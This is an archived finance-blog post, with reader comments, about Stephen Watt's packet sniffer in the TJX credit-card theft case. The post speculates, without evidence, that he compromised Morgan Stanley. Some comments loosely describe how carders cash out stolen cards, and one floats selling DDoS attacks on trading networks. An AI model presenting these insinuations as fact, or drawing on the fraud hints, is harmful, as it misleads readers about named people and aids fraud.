This page has been archived and commenting is disabled.
Was Morgan Stanley Compromised By Project Mayhem?
One of the key headlines these days has been the unmasking of what has been dubbed the biggest identity theft and credit card fraud case in history, allegedly spearheaded by one Albert Gonzalez, who in 2003 was involved in a comparable scheme however upon being caught, promptly became an informant for the Secret Service and turned over 30 of his hacking buddies. Six years later it is he this time who is in the hot seat, together with most of his associates, including one 25 year old Stephen Watt, who supposedly was the creator of the credit card sniffer software used to hack into over 130 million of various credit cards for merchants such as TJX, Dave And Busters and 7-Eleven, which numbers were subsequently sold for hefty sums to Eastern European purchasers. What is peculiar in all this is that apparently for the entire duration of this operation, Stephen was working in "Application infrastructure development and in house security toolkit development" at Morgan Stanley (earning $99,000 a year as a 21-23 year old programmer in 2004-2007), and subsequently took a brief position with Imagine Software, where he developed "real-time computer trading programs for financial firms." Did Stephen learn the tools of the trading game at MS, while at the same time hacking millions of credit cards, only to take what he learned from both ventures into a new operation, one that counts among its clients the Who's Who of Wall Street? Or, alternatively, did he use his packet sniffing skills at Morgan Stanley? The questions grow...
While the case against Gonzalez is rather clear cut, with him apparently being a recidivist, who should have been taken down the first time around the Secret Service got involved in his deal, that of Watt is less conclusive. According to Wired magazine, "[Gonzalez] spent $75,000 on a birthday party for himself and once complained that he had to manually count $340,000 in pilfered $20 bills because his counting machine broke. But while Gonzalez apparently lived high off ill-gotten gains, [Watt] sits broke and unemployed, his career in shambles, while awaiting sentencing for a piece of software he crafted for his friend."
To be sure Watt's involvement in the hacking industry has its roots in his past:
Though it’s unacknowledged by the prosecution and defense, Watt was once known in hacker circles as “Jim Jones” and “Unix Terrorist.” In the late 1990s and early 2000s, that hacker was part of a band of self-proclaimed black hats that opposed the publication of security vulnerabilities and resisted the hacking scene’s shift from recreational network intrusions to legitimate security research.
“I figured out his name years ago, Stephen Huntley Watt, and then the guy wound up getting indicted on the TJ Maxx thing,” says former hacker Kevin Mitnick.
Under the rubric Project Mayhem, the gang managed to hack into the accounts of a number of prominent “white hat” hackers and publish their private files and e-mails. At the 2002 DefCon hacker conference, Watt took the stage with two friends to personally share some of the hacked e-mails.
What exactly is the prosecution's case against Watt:
The Information alleges that WATT was a member of a conspiracy which, between 2003 and 2008, unlawfully gained electronic access to corporate computer networks using various techniques, downloaded customers’ credit and debit card information, and fraudulently used that information and sold the information to others for fraudulent use. The Information further alleges that WATT modified and provided a “sniffer” program used by the conspirators to monitor and capture the data crossing corporate computer networks.
The full sentencing memorandum against Watt is presented below (trust the United States Of America to be unable to even get the name of the only defendant correct, one would imagine the SEC is somehow involved here):
For a more humane representation of Stephen Watt's actions we recommend reading the Sentencing Memorandum prepared by Watt's lawyer, Michael Farkas, presented below:
Yet, while Zero Hedge will not make any determinations with regard to a justification of Stephen's actions (although there is a certain soft spot for an individual who used a Project Mayhem moniker in his transgressions) what is a major issue here is what if anything did Watt do while he was employed as a "software engineer" at Morgan Stanley, especially since the primary action against him by the government is that he created an (illegal) packet sniffer dubbed "blabla", and what skills did he learn there (and possibly abuse) to take to his next employer Imagine Software where, as the memorandum reveals, he worked on "software such as real-time computer trading programs for financial firms."
Notable is that the entire case against Watt revolves around his creation of a packet sniffer: a program that, by its simplest definition, allows the interception or capture of IP traffic. From the Watt Memorandum:
A program known as a "sniffer" refers to a class of application that captures any type of data that travels across a communications network. "Packet sniffers" are the most commonly referenced, which are used to capture and often store data that travel across a local network or the Internet. Sniffers serve a wide variety of purposes and can be used in many sorts of legitimate research, diagnostics, and security-related scenarios, in addition to illegal data gathering... and from the footnote: Sniffers can also be appropriated for malicious activity, as they can also be used to capture information that travels across networks such as logins and passwords, transmitted files, and various forms of electronic conversations.
And the reason why Watt is in this jam is precisely because he created a sniffer to isolate credit card numbers out of total Internet traffic:
The sniffer "blabla" involved in this case falls into this latter class of sniffers, which blindly logs any type of data. Specifically, it is known as a "raw TCP sniffer," which can be used to "sniff" incoming data to any sort of Internet server as it was not designed with the prescience of any target host computer or network.
For the conspiracy minded, let's recall that packet sniffing was one of Sergey Aleynikov's, of Goldman Sachs "market manipulation" allegation fame, primary background strong suits. One need not think too hard about how having the benefit of non-public data information in the field of High Frequency Trading (ignoring the concept of Flash orders for the purpose of this thought experiment) could provide a massive profitable leg up to the entity that managed to (surreptitiously) control such packet sniffing.
Which raises the question: was Watt, while employed at Morgan Stanley between 2004 and 2007, a time bracketed on both sides by his illegal activities in the 2003-2008 period, using his knowledge of packet sniffers only in the context of his allegedly illegal scheme to capture credit card numbers while working with Gonzalez, or did his expertise render him more valuable to Morgan Stanley than the headlines would make it seem? Alternatively, did an unquestionably bright Watt realize some of the weaknesses in MS' trading infrastructure, and if so, have these been disseminated? After all it took just a hint of potential impropriety in the Aleynikov case to have the Fed's arrest him just days after Goldman's awareness of his activity (not to mention a bail higher than that of "Sir" Alen Stanford).
An indication to this may be provided by by some hacker disclosures on bulletin boards, where n0td3v writes that Watt is best known for "back dooring of the Qualys Vulnerability Scanner." The fact that Watt actually did work at Qualys in 2001-2002 is not lost. Perhaps Watt's MO, is that if his skills were not used directly for the benefit of his current employer, was to discover the weaknesses present in the IT infrastructure with the goal of potential subsequent abuse?
Yet it bears pointing out that the firm that Watt left for after quitting Morgan Stanley, Imagine Software, counts among its clients such names Credit Suisse, Deutsche Bank, Jefferies, Smith Barney, Millennium Management, PNC... and Goldman Sachs JBWere. From Imagine's About Us section:
Imagine’s reputation for delivering tangible competitive advantage is based upon proven innovation that enables users to stay abreast of the market. Imagine Software puts institutional-grade functionality, broad cross-asset instrument support, and the ability to employ any trading strategy in the hands of sell- and buy-side businesses of all sizes.
Introduced enterprise solution, Imagine Trading System, in 1993, and ASP solution, Derivatives.com, in 2000
- Headquartered in New York with offices in London, Sydney, and Hong Kong
- Thousands of users across major hedge funds, fund-of-funds, pension funds, brokerage firms and banks worldwide
- Significant prime broker relationship with Credit Suisse
- Relationships with other major prime brokers
- Leading provider of on-demand derivative trading analytics, portfolio and risk management solutions
- Winner of two #1 Risk Magazine Awards (equity trading and equity analytics) several years in a row
Whether Watt's potential transgressions include just the creation of the blabla packet sniffer which was used to defraud numerous public companies out of hundreds of millions, or were his unique skills geared for something more, now that the bright 7 foot tall hacker had managed to find his way into the pinnacle of financial society, will likely remain unknown. However, Zero Hedge will follow the case (District Court of Massachusetts, 08-cr-10318) and await eagerly the release of the transcript of the Sentencing Hearing of Watt, which should be made available to the public in mid-September (presumably severely redacted just like the previously filed disclosure by Belopolsky and Volfbeyn againt RenTec: wouldn't want those "trade secrets" leaking now, would we).
In conclusion, this case which seems to have more and more loose ends unravel each and every day, could potentially benefit by the prosecutors focusing not just on the direct actions of Watt while collaborating with Gonzalez, but on whether there was any potential impropriety by the alleged perpetrator while employed in the capacity of a programmer, dealing with what by all counts seems to be very intimate day-trading software at major Wall Street organizations.
»
- 9415 reads
- Printer-friendly version
- Send to friend
- advertisements -
I guess the real question is, was he using his mad skillz for evil, or for EVIL?
sounds more like eeevviilllll to me...
I feel like this is grasping a bit.
I'll have to agree. I see this as a guy who was writing software at MS for their (legitimate or otherwise) business needs but that could also be used universally for personal gain. Corporate programmer by day, black hat fraudster by night. That fits the description of probably 20% of network programmers today.
I am Chumbawamba, and I know of what I speak.
Too naive.
He is a criminal. He is a hacker that used his skill for personnel gains. Morgan Stanley computer network has been compromised. If I were the head of the IT department I would clean all computers and servers. Stop any programs that was built or touch by him and anything that looks suspicious I would close up in a heart beat.
You obviously have no clue what the implications of this are..
So what about the "bear" signal end of 2006? And the bullish signal before the great plunge in 2008...
good articles; good articles 4 slow news day ..http://www..
hat tip: finance news & finance opinions
i know i would be bitching too if i had to count 340,000 usd manually - who the fuck has time to count 17,000 bills???...what a total and complete crock...and where was the flunky??
imagine how easy his job at Morgan Stanley was compared to his job sniffing credit card numbers, etc.
geez, he not only knew exactly all the pipelines to tap but had the encryption software in hand too.
China Investment Investing Billions in Hedge Funds
"China Investment Corp. had $297.5 billion in assets and had 87.4 percent of its global portfolio invested in cash and cash equivalents at the end of last year, the fund reported earlier this month."
http://www.bloomberg.com/apps/news?pid=20601087&sid=a4FINX22BV8c
did he end up following the white rabbit?
Packet sniffing+flash orders. And most probably that is how the technique was developed. Now it is all ading up. I have witnessed that first hand while watching the offer/bid on a graph. A regular linear time trade going sometimes very regularly with no direction,where the price suddenly collapses severely(and sometimes gets scary if you are long the stock),and suddenly and misteriously it stops at a bid and starts climbing back(and sometimes with a vengenace!!!). I always wondered about it,untill I read here about flash orders. And now it is more clear,packet sniffing as in order(which is nothing more than a packet in a computer) sniffing,makes perfect sense. So The question is now will Mr Watt be sentenced to innocence if he can prove that his packet sniffing software has the same function as flash orders trade?since the latter is perfectly endorsed by the law(untill now)why not Mr. Watt's software too?And if he is found guilty,would flash trade be banned and people who implemented it brought to justice if it could be proved that it does the same function as a Watt's software?which is sniffing my credit card number,buying that chinese doll and then turning around and selling to me for a couple of extra pennies?
+10
Miami attorney Michael Farkas, who founded SkyWay Aircraft, which owned the DC9 busted in Mexico 18 months ago with 5.5 tons of cocaine aboard.?
i am sure it was all a misunderstanding - an
administrative error with an internal investigation
to follow to see if there was any wrongdoing
or procedural improvements to be implemented...
Apparently not. That was Michael D. Farkas, this one's Michael C.
http://www.politicalfriendster.com/rateConnection.php?id1=6330&id2=3698
what I want to know is how shitty does an IT dept need to be that it doesnt encrypt its traffic? Who is transmitting card data in open text? You can sniff all day but if you cant break the encryption then all you are going to get is garbage.
I agree with you. 99.999999999999% od all credit card info is encrypted. Packet sniffing is worth CRAP since most segments are on switches and those switches only show that legs's traffic.
which raises the very interesting question
of decrytpion technology....surely you know
about promis....i suspect that the traffic was
indeed encrypted but that the villains could
readily decrypt it thanks to our friends
at the fbi and cia...
A lot of the shitty PCI certified retail CC processing software out there (ISD for example) make bad assumptions regarding a lot of their endpoints as being "secured with compensating controls". In reality they are not. Thankfully a lot of the devices now do message content encryption from device (verifone or ingenico) to the procesing layer of at least the CC# itself. But that does not help you if the POS software then does something stupid with that number on the receiving end over an unsecure network.
you have to have a seriously incompetent IT staff to allow credit card information to pass through the tubes in clear text. you wouldn't need a custom sniffer to get that information.
honestly, if i had the resources available to me, i would find a way to ddos the nets where the flash trades are being done, then sell that service to the highest bidder. think of the havoc you could create by bringing down a competitors ability to snap off their trades
Not true. You could get the certs/keys, sniff encrypted traffic and decrypt on-the-fly.
And for that you'd most likely need custom sniffer, 'cos tcpdump won't cut it.
this is all speculation....it is important
to know the security standards on the compromised
servers and if indeed hackers could access
the certificates and keys....
facts are more interesting...
Meet Stephen Watt:
http://www.wired.com/images_blogs/threatlevel/2009/06/swatt.jpg
Looks kinda cool, like the kind of guy I'd like to have a few beers with. Notice the necklace. I'm going to take a wild guess and say that it's a reference to cDc which is cultDeadcow. I like Stephen Watt.
The problem with this story is first, that maybe he did nothing wrong while at MorganStanley, but obviously the possibility exists that they or the evil empire at 85 Broad (soon to be 200 West) could design some sniffer packets for bad bad things and no one would know.
This story about the 200 billion credit cards stolen is pure hype. IT'S AN ILLUSION. Designed to focus on the small hacker, the pot dealer on the corner if you will. Meantime $100 million per day gets stolen by Mr. Big Time and his empire of computer programmers. Only 2 losing trading days out of 63, better record than Bernie.
Think this is far fetched do you? Conspiracy theory over here? Well HERE'S THE PROOF, from none other than Microsoft itself (yes I know it's ironic). "Nobody Sells Gold For The Price Of Silver"
http://research.microsoft.com/pubs/80034/nobodysellsgoldforthepriceofsilver.pdf
Did you even read that academic paper you posted?
It doesn't suggest that the market doesn't exist. It suggests that the IRC market isn't where most of the transactions occur, which is entirely correct. There are "secret" IRC servers that the efnet channels are basically fronts for. That's why nobody ever talks on efnet.
The reason the dumps go for so low per account is you can't use them easily. Getting the information is only half of the equation.
For instance, if you have a corporate bank account number, you have to fraudulently contract the services of an ACH capable finance firm, usually a payroll firm, to actually get the money out of there. That's not easy to do.
Carding is difficult too because you have to specify a physical drop site and then camp it out for your goods to arrive and hope you aren't being watched.
This is economy is real, and the fact one of these guys worked for Morgan Stanley should concern you.
Yur doin it rong.
The drop site is your ebay high bidder, or your "work at home" flunky.
stick to the point, not mentioning every possibility. the person i am responding to claims that this economy doesn't exist.
you think a hacker cares about such boring activities?
thats why there exists a division of labor
Anon 52971, I read the paper again, and I think your interpretation is incorrect. The paper says that a black market for stolen credit card numbers certainly exists, however, the ASKING price of those (individual) card numbers ranges from 0.50 to $12. Only a small percentage get sold. That's because they are hard to monetize.
The paper makes clear that companies like Symantec have a vested interest in exaggerating the amount of losses because of the security software they sell.
I would argue that other vested interests are exaggeratering this case because it diverts attention from other questionable activites, specifically on Wall Street.
Yes, I do agree with your concern about Morgan Stanley. I don't subscribe to the argument that a hacker can wear a white hat during the day and a black hat at night.
Regarding the specific case of Stephen Watt, he supplied a packet sniffer to his friend. He did not get paid for the sniffer or anything else. He should NOT go to jail.
the_uT hates cDc, but whatever.
Yep. Well said. If you're not focusing on the problem then it can continue on.
i agree that someone may have been thrown
under the bus
but if there is a larger conspiracy or bigger
fish to fry then the suspect in this
case is morgan stanley - not goldman sachs...
there is no evidence linking watt to gs....
Agreed. Those were the days. During Defcon the Alexa hotel was a recruiting ground for corporate America and the feds but we could care less. We were all too busy trying to showcase skills at Capture the Flag.
I studied this case at University of Florida, Criminology Department. This thing is huge and deep... the Russians are heavily involved...
Shhhh!
Users from Russia constitute the 5th largest group of readers of Zero Hedge. That's very unusual for a USA-based "finance" blog.
careful, I bet ol Obama is just waiting for an opportunity to restart the Cold War. Voila, unemployment solved. Like that movie Canadian Bacon. Plus there's a shitload of crazy Russians in my neighborhood. Infiltration?
Beg to differ James. What are the Russians doing with all those credit card numbers? A Samsung 52" LCD for everyone? Don't you think the banks have software to flag a purchase shipped to Russia or anywhere other than the cardholders address? The going rate for stolen card numbers is quite low because they are hard to convert to currency. The number of cards stolen may be large but the amount of money stolen is small. These hackers are the least skilled and certainly not the Tony Montana of hacking.
The big money is on Wall Street.
the unix terrorist is the tony montana of hacking.
Think gatekeeper and your a step closer. This is old new from legecy network data traffic we where responsible for then. We had bot wars then and still today with our left sided brained fellows. Then we allocatted, decompiled send back and poof, oh you needed that firmware for your bios sorry - ping hehe. and just rewrapped news for today. treasury, justice, et al it was just a matter of time for marshall dillon to arrest a clever individual. This case just took time as they all do. Sometimes I miss Unix but there are so many issues I sold my position. It was fun working with Lucent and ATT, Brooks Communication bought by MCI and onward with innovation. Like the site conveys change is on the inside. IServ ended up with our creation but I learned earned and moved on.
Zerohedge is everywhere!
http://blogs.reuters.com/rolfe-winkler/2009/08/24/lunchtime-links-8-24/
Rolfe made it on Reuters. That kid is a badass thinker and writer.
For what it's worth, Nancy Gertner is exactly the type of judge you'd want on a case like this... I can't think of anyone on the Boston federal bench who is less likely to humor or go along with the preferences of an IB if there's a question of a Larger Scandal.
Tyler, why don't you guys pick up where the 60 minutes piece left off and see what you can dig up on Morgan Stanley's alleged manipulation of the oil market. Like following the little hacker kid, just follow the ex-Enron employees to the stink. It's a pretty common theme around here that the equity markets are manipulated, but why don't you try and tackle the commodities paper scam.
Excellent point!
You can bet if Mr Watt was facilitating MS in doing anything illegal, he will sing like a bird to the feds. This is assuming the feds are not compromised by political quashing of the evidence.
It's another case of prosecutors attempting screw everyone in sight, even those who had only a superficial role in this scam.
The sniffer that Watt supposedly "provided" is a common and frequently used tool, available for download at a number of public web sites.
See: http://www.winpcap.org/
The software simply records network packets that pass by on the network that it is connected to - this is commonly used to measure network utilization, and to perform throttling (by cable internet providers).
The prosecutors don't care about completely ruining someones life and work prospects. They just want another "kill" on their resumes.
That's what has become of the "justice system".
In possibility, yes.
good articles; good articles 4 slow news day ..http://www..
hat tip: finance news & finance opinions
I saw the_UT's talk at DefCon. The title of the talk was "Security Wolves Among Us".
Conflating jobs at financial institutions into some kind of paranoid fantasy is a waste of energy.
1. Those jobs pay well. Not exciting, but pay well.
2. Cracking payment backends is mostly an intellectual challenge that's exciting for some that have mastered computers.
>Application infrastructure development and in house security toolkit development
This is the department at Morgan Stanley that writes tools for the actual trading system developers to use.
Noone in that department is exposed to the business or the trading desk - those guys are back room weirdos who aren't allowed anywhere near the traders.
He may have picked up some technical skills while he was At MS, but he won't have been anywhere near any trading engines or anything that was dealing with actual business data.